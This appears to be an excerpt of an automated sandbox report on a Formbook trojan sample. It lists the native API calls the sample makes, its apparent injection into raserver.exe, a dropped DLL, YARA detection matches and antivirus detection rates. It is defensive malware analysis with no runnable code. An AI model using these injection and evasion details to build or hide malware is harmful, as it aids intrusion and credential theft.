Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_004181B0 NtCreateFile,	1_2_004181B0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00418260 NtReadFile,	1_2_00418260
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_004182E0 NtClose,	1_2_004182E0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00418390 NtAllocateVirtualMemory,	1_2_00418390
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_004181AA NtCreateFile,	1_2_004181AA
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041825A NtReadFile,	1_2_0041825A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_004182DA NtClose,	1_2_004182DA
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D98F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_009D98F0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9840 NtDelayExecution,LdrInitializeThunk,	1_2_009D9840
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_009D9860
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D99A0 NtCreateSection,LdrInitializeThunk,	1_2_009D99A0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_009D9910
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_009D9A00
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9A20 NtResumeThread,LdrInitializeThunk,	1_2_009D9A20
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9A50 NtCreateFile,LdrInitializeThunk,	1_2_009D9A50
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D95D0 NtClose,LdrInitializeThunk,	1_2_009D95D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9540 NtReadFile,LdrInitializeThunk,	1_2_009D9540
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D96E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_009D96E0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_009D9660
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9780 NtMapViewOfSection,LdrInitializeThunk,	1_2_009D9780
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D97A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_009D97A0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9FE0 NtCreateMutant,LdrInitializeThunk,	1_2_009D9FE0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9710 NtQueryInformationToken,LdrInitializeThunk,	1_2_009D9710
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D98A0 NtWriteVirtualMemory,	1_2_009D98A0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9820 NtEnumerateKey,	1_2_009D9820
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009DB040 NtSuspendThread,	1_2_009DB040
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D99D0 NtCreateProcessEx,	1_2_009D99D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9950 NtQueueApcThread,	1_2_009D9950
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9A80 NtOpenDirectoryObject,	1_2_009D9A80
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9A10 NtQuerySection,	1_2_009D9A10
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009DA3B0 NtGetContextThread,	1_2_009DA3B0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9B00 NtSetValueKey,	1_2_009D9B00
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D95F0 NtQueryInformationFile,	1_2_009D95F0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009DAD30 NtSetContextThread,	1_2_009DAD30
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9520 NtWaitForSingleObject,	1_2_009D9520
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9560 NtWriteFile,	1_2_009D9560
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D96D0 NtCreateKey,	1_2_009D96D0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9610 NtEnumerateValueKey,	1_2_009D9610
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9650 NtQueryValueKey,	1_2_009D9650
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9670 NtQueryInformationProcess,	1_2_009D9670
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009DA710 NtOpenProcessToken,	1_2_009DA710
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9730 NtQueryVirtualMemory,	1_2_009D9730
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9770 NtSetInformationFile,	1_2_009D9770
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009DA770 NtOpenThread,	1_2_009DA770
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009D9760 NtOpenProcess,	1_2_009D9760
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_004181B0 NtCreateFile,	1_1_004181B0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00418260 NtReadFile,	1_1_00418260
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_004182E0 NtClose,	1_1_004182E0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00418390 NtAllocateVirtualMemory,	1_1_00418390
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_004181AA NtCreateFile,	1_1_004181AA
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_0041825A NtReadFile,	1_1_0041825A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_004182DA NtClose,	1_1_004182DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04B09860
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09840 NtDelayExecution,LdrInitializeThunk,	9_2_04B09840
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B099A0 NtCreateSection,LdrInitializeThunk,	9_2_04B099A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B095D0 NtClose,LdrInitializeThunk,	9_2_04B095D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_04B09910
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09540 NtReadFile,LdrInitializeThunk,	9_2_04B09540
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_04B096E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B096D0 NtCreateKey,LdrInitializeThunk,	9_2_04B096D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04B09660
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09650 NtQueryValueKey,LdrInitializeThunk,	9_2_04B09650
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09A50 NtCreateFile,LdrInitializeThunk,	9_2_04B09A50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,	9_2_04B09780
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,	9_2_04B09FE0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,	9_2_04B09710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B098A0 NtWriteVirtualMemory,	9_2_04B098A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B098F0 NtReadVirtualMemory,	9_2_04B098F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09820 NtEnumerateKey,	9_2_04B09820
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0B040 NtSuspendThread,	9_2_04B0B040
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B095F0 NtQueryInformationFile,	9_2_04B095F0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B099D0 NtCreateProcessEx,	9_2_04B099D0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0AD30 NtSetContextThread,	9_2_04B0AD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09520 NtWaitForSingleObject,	9_2_04B09520
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09560 NtWriteFile,	9_2_04B09560
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09950 NtQueueApcThread,	9_2_04B09950
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09A80 NtOpenDirectoryObject,	9_2_04B09A80
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09A20 NtResumeThread,	9_2_04B09A20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09610 NtEnumerateValueKey,	9_2_04B09610
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09A10 NtQuerySection,	9_2_04B09A10
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09A00 NtProtectVirtualMemory,	9_2_04B09A00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09670 NtQueryInformationProcess,	9_2_04B09670
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0A3B0 NtGetContextThread,	9_2_04B0A3B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B097A0 NtUnmapViewOfSection,	9_2_04B097A0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09730 NtQueryVirtualMemory,	9_2_04B09730
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0A710 NtOpenProcessToken,	9_2_04B0A710
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09B00 NtSetValueKey,	9_2_04B09B00
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09770 NtSetInformationFile,	9_2_04B09770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B0A770 NtOpenThread,	9_2_04B0A770
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B09760 NtOpenProcess,	9_2_04B09760
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B081B0 NtCreateFile,	9_2_00B081B0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B082E0 NtClose,	9_2_00B082E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B08260 NtReadFile,	9_2_00B08260
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B08390 NtAllocateVirtualMemory,	9_2_00B08390
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B081AA NtCreateFile,	9_2_00B081AA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B082DA NtClose,	9_2_00B082DA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0825A NtReadFile,	9_2_00B0825A

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403486

Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_00407272	0_2_00407272
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_00406A9B	0_2_00406A9B
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 0_2_70481A98	0_2_70481A98
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00408C50	1_2_00408C50
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00408C0A	1_2_00408C0A
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041BC2E	1_2_0041BC2E
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041B544	1_2_0041B544
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00402D87	1_2_00402D87
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0041C722	1_2_0041C722
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009AB090	1_2_009AB090
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A51002	1_2_00A51002
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_0099F900	1_2_0099F900
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B4120	1_2_009B4120
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009CEBB0	1_2_009CEBB0
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00990D20	1_2_00990D20
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_00A61D55	1_2_00A61D55
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_2_009B6E30	1_2_009B6E30
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: 1_1_00401030	1_1_00401030
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADB090	9_2_04ADB090
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AD841F	9_2_04AD841F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B81002	9_2_04B81002
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ADD5E0	9_2_04ADD5E0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AC0D20	9_2_04AC0D20
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE4120	9_2_04AE4120
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04ACF900	9_2_04ACF900
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04B91D55	9_2_04B91D55
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AE6E30	9_2_04AE6E30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_04AFEBB0	9_2_04AFEBB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0BC2A	9_2_00B0BC2A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00AF8C0A	9_2_00AF8C0A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00AF8C50	9_2_00AF8C50
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00AF2D87	9_2_00AF2D87
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00AF2D90	9_2_00AF2D90
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00AF2FB0	9_2_00AF2FB0
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 9_2_00B0C722	9_2_00B0C722

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\h1luljvls0ea.dll 41B9F5241987338FAA262090BEAB1ADF4A9821497011BBE87D3A770F2C926666

Source: C:\Windows\SysWOW64\raserver.exe	Code function: String function: 04ACB150 appears 32 times
Source: C:\Users\user\Desktop\lpdKSOB78u.exe	Code function: String function: 0041A090 appears 40 times

Source: lpdKSOB78u.exe, 00000000.00000003.204440401.0000000002D0F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe
Source: lpdKSOB78u.exe, 00000000.00000002.211643992.0000000000C30000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs lpdKSOB78u.exe
Source: lpdKSOB78u.exe, 00000001.00000002.265933060.0000000000969000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameraserver.exej% vs lpdKSOB78u.exe
Source: lpdKSOB78u.exe, 00000001.00000002.266056817.0000000000A8F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs lpdKSOB78u.exe

Source: lpdKSOB78u.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.471497845.0000000000DB0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.265826962.00000000008E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.471203600.0000000000D80000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.213421837.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.265809915.00000000008B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.265648023.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.469614827.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.209707137.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.lpdKSOB78u.exe.2a30000.5.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.lpdKSOB78u.exe.2a30000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.lpdKSOB78u.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.lpdKSOB78u.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/4@14/8

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

0_2_00403486

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_00404763 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404763

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_703C4243 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,

0_2_703C4243

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,

0_2_0040216B

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

File created: C:\Users\user\AppData\Local\Temp\nsx545.tmp

Jump to behavior

Source: lpdKSOB78u.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: lpdKSOB78u.exe	Virustotal: Detection: 44%
Source: lpdKSOB78u.exe	ReversingLabs: Detection: 36%

Source: C:\Users\user\Desktop\lpdKSOB78u.exe

File read: C:\Users\user\Desktop\lpdKSOB78u.exe

Jump to behavior

